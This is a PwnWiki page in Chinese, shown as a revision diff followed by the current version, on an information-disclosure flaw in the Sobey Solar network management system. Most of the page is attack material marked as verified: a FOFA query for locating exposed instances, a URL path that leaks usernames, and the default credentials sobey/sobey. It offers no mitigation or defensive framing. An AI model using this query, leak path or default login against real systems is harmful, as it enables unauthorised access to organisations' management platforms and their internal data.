Difference between revisions of "Sobey(索貝)Solar网络管理系统信息泄漏漏洞"

From PwnWiki
(Created page with "{| style="margin: auto; width: 750px;color:green;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | valig...")
 
(Marked this version for translation)
 
Line 11: Line 11:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==簡介==
+
==簡介== <!--T:1-->
  
 +
<!--T:2-->
 
Solar網絡管理平台又名金字塔網絡管理系統,是一種統一管理所有後台配置的系統。其中包含台內系統的業務數據展示,基礎數據配置、任務情況顯示、日誌詳情查詢。功能齊全、展示清晰,通過不同角色的權限控制展示相應內容,科學管理台內數據。
 
Solar網絡管理平台又名金字塔網絡管理系統,是一種統一管理所有後台配置的系統。其中包含台內系統的業務數據展示,基礎數據配置、任務情況顯示、日誌詳情查詢。功能齊全、展示清晰,通過不同角色的權限控制展示相應內容,科學管理台內數據。
  
Line 24: Line 25:
 
==Payload==
 
==Payload==
 
<translate>
 
<translate>
===泄漏用戶名:===
+
===泄漏用戶名:=== <!--T:3-->
 
<pre>
 
<pre>
 
http://<target>/application/components_solar/loginController.js
 
http://<target>/application/components_solar/loginController.js
Line 31: Line 32:
  
 
<translate>
 
<translate>
==默認口令==
+
==默認口令== <!--T:4-->
 
</translate>
 
</translate>
 
sobey/sobey
 
sobey/sobey

Latest revision as of 11:40, 22 June 2021

Check.png 該漏洞已通過驗證。
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。


Other languages:

簡介

Solar網絡管理平台又名金字塔網絡管理系統,是一種統一管理所有後台配置的系統。其中包含台內系統的業務數據展示,基礎數據配置、任務情況顯示、日誌詳情查詢。功能齊全、展示清晰,通過不同角色的權限控制展示相應內容,科學管理台內數據。


FOFA

"application/components_solar/loginController.js"

Payload

泄漏用戶名:

http://<target>/application/components_solar/loginController.js

默認口令

sobey/sobey